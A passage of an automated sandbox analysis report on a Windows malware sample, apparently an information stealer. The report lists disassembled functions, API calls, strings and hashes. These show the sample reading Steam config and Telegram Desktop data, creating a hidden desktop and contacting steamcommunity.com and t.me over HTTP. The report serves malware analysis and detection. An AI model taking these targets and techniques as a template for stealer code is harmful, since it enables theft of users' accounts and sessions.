                                                                                                                                                                                                                                                                                                  • CreateDesktopA.USER32 ref: 00407166
                                                                                                                                                                                                                                                                                                  • lstrcpyA.KERNEL32(?,00000000,?,OCALAPPDATA,00000000,?,0000001C), ref: 004071BD
                                                                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 00407222
                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8,00000000,00000000,?,00000000,?), ref: 0040725B
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Desktop$CreateOpenSleeplstrcpymemcpystrlen
                                                                                                                                                                                                                                                                                                  • String ID: %s%s"$ChromeBuildTools$D$OCALAPPDATA
                                                                                                                                                                                                                                                                                                  • API String ID: 3603158527-2020731023
                                                                                                                                                                                                                                                                                                  • Opcode ID: f957c9f241f1788a6717240c2f5f4c9f278a5156d0a920e059212db3f08382fb
                                                                                                                                                                                                                                                                                                  • Instruction ID: f2f5d87aafaa2d86ed8620da2dc3468a3bb05fc034b5e9ecb920fc18406a804c
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f957c9f241f1788a6717240c2f5f4c9f278a5156d0a920e059212db3f08382fb
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 56313771D04344ABDB21EB218D41BEFB774AF95304F00419EF90832192DB786AC5CBAA
                                                                                                                                                                                                                                                                                                  Function 00414FE0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 261registrystringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000001,Software\Valve\Steam,00000000,00020119,?), ref: 0041506F
                                                                                                                                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,SteamPath,00000000,00000000,?,000000FF), ref: 00415090
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414BD0: wsprintfA.USER32 ref: 00414BEE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414BD0: FindFirstFileA.KERNEL32(?,?), ref: 00414BFF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414BD0: strlen.MSVCRT ref: 00414CA9
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414BD0: memcmp.MSVCRT(00000000,00000000,00000000,00000001), ref: 00414CEB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414BD0: strlen.MSVCRT ref: 00414D57
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414BD0: memcmp.MSVCRT(00000000,00000000,00000000,0042113D,00000002,?,?,?,00000001), ref: 00414D94
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00415099
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,?,?,00000104), ref: 004150B8
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,\config\), ref: 004150C4
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcatmemcmpstrlen$CloseFileFindFirstOpenQueryValuelstrcpywsprintf
                                                                                                                                                                                                                                                                                                  • String ID: Software\Valve\Steam$SteamPath$\config\
                                                                                                                                                                                                                                                                                                  • API String ID: 393122709-2561568711
                                                                                                                                                                                                                                                                                                  • Opcode ID: 5586b393047b28cf48fe9dec46dc0ec11d4a7ee0403769a6eb676b6b1167209c
                                                                                                                                                                                                                                                                                                  • Instruction ID: 85194e8d5805dad303305febaf6046d54008d8169596ab7e5b376dc9a1cdcd29
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5586b393047b28cf48fe9dec46dc0ec11d4a7ee0403769a6eb676b6b1167209c
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AAC17131C107489ADB01EF64C9C15FA73B8AF6D318F019289FD496A017EB78BAD4CB94
                                                                                                                                                                                                                                                                                                  Function 00416330 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 247stringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411550: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00411589
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00000000,?,0000001A,?,00000104), ref: 00416367
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,\Telegram Desktop\), ref: 00416376
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00416330: wsprintfA.USER32 ref: 00415DBE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00416330: FindFirstFileA.KERNEL32(?,?), ref: 00415DCF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00416330: strlen.MSVCRT ref: 00415F1C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00416330: memcmp.MSVCRT(00000000,00000000,00000000,00000001), ref: 00415F5B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00416330: strlen.MSVCRT ref: 00415FC7
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00416330: memcmp.MSVCRT(00000000,00000000,00000000,0042113D,00000002,?,?,?,00000001), ref: 00416004
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcatmemcmpstrlen$FileFindFirstFolderPathlstrcpywsprintf
                                                                                                                                                                                                                                                                                                  • String ID: %s\%s$%s\*$C:\ProgramData\$Soft$\Telegram Desktop\
                                                                                                                                                                                                                                                                                                  • API String ID: 2540414856-1297282028
                                                                                                                                                                                                                                                                                                  • Opcode ID: 48fb6209651f6f965a5a0533c29178d570c3f552c85b2c53c6e43cdd25c8a249
                                                                                                                                                                                                                                                                                                  • Instruction ID: 64e18173e81040c63563a2c948d1254a8cd49f8bd4ee544822172e8b9e7dfe6d
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 48fb6209651f6f965a5a0533c29178d570c3f552c85b2c53c6e43cdd25c8a249
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 09B19571810B4EA7DB00EF75C9858D9B768BF69308F40924AFD0952502EB78F6E8CBD4
                                                                                                                                                                                                                                                                                                  Function 00410B30 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 33registrymemoryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 00410B42
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 00410B50
                                                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00020119,?), ref: 00410B68
                                                                                                                                                                                                                                                                                                  • RegQueryValueExA.KERNEL32(?,ProcessorNameString,00000000,00000000,00000000,000000FF), ref: 00410B85
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00410B8E
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 00410B5E
                                                                                                                                                                                                                                                                                                  • ProcessorNameString, xrefs: 00410B7C
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                                                                                                  • String ID: HARDWARE\DESCRIPTION\System\CentralProcessor\0$ProcessorNameString
                                                                                                                                                                                                                                                                                                  • API String ID: 3466090806-2804670039
                                                                                                                                                                                                                                                                                                  • Opcode ID: ad177650e976e3d35c7c3a9112606bb10243cc343026616705170833e325d11c
                                                                                                                                                                                                                                                                                                  • Instruction ID: 414338a11f3689f75f6fdb63b0f136fa5a8568cc8c95f28b9b39ab38a5685d7b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ad177650e976e3d35c7c3a9112606bb10243cc343026616705170833e325d11c
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 04F08230784320BBD3106B24AC0AF5A7A99AB45B51F504029F685A71E1D6A06C508BD5
                                                                                                                                                                                                                                                                                                  Function 00416B40 Relevance: 10.8, APIs: 4, Strings: 3, Instructions: 258stringsleepCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410240: lstrlenA.KERNEL32(?,?,?,00417367,0042150A,0042150A,?,?,?,?,00418606), ref: 00410249
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410240: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,?,00418606), ref: 0041027A
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(?,00000000,0042150A,0042150A), ref: 00416C6A
                                                                                                                                                                                                                                                                                                  • strstr.MSVCRT ref: 00416C82
                                                                                                                                                                                                                                                                                                  • strstr.MSVCRT ref: 00416C94
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(0000EA60,?,0042150A,00000000,0042150A,0042150A), ref: 00416DC7
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcpylstrlenstrstr$Sleep
                                                                                                                                                                                                                                                                                                  • String ID: ERROR$steamcommunity.com$t.me
                                                                                                                                                                                                                                                                                                  • API String ID: 1105026832-5696879
                                                                                                                                                                                                                                                                                                  • Opcode ID: cfbe53031ad5f4abf68ac17c1e9529c3c811d18bb84b897b5de7f13dc1821656
                                                                                                                                                                                                                                                                                                  • Instruction ID: d2cef3e00896b903973622f9bff644efbf55bb675c2f2304de14bb25205f25c7
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cfbe53031ad5f4abf68ac17c1e9529c3c811d18bb84b897b5de7f13dc1821656
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9CA1C131900619ABCF05EFA1C9958EEB775BF58308F00814AF8056B152EF7CAAD5CBD5
                                                                                                                                                                                                                                                                                                  Function 004169C0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 119stringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404280: InternetOpenA.WININET ref: 004042E1
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404280: StrCmpCA.SHLWAPI(?,https), ref: 004042F4
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404280: InternetConnectA.WININET ref: 0040432D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404280: HttpOpenRequestA.WININET(00000000,GET,?,HTTP/1.1,00000000,00000000,00000000,00000000), ref: 00404360
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404280: InternetSetOptionA.WININET(00000000,0000001F,FFFFFFFF,00000004), ref: 00404387
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404280: HttpSendRequestA.WININET ref: 0040439B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404280: HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 004043B3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR,?,?,0042150A), ref: 00416A2B
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00416A46
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004115B0: LocalAlloc.KERNEL32(00000040,?,?,00000000,?,?,00416A58,00000000,00000000), ref: 004115D4
                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,00000000,00000000,00000000), ref: 00416A6E
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00416A8F
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000001,?), ref: 00416AA6
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
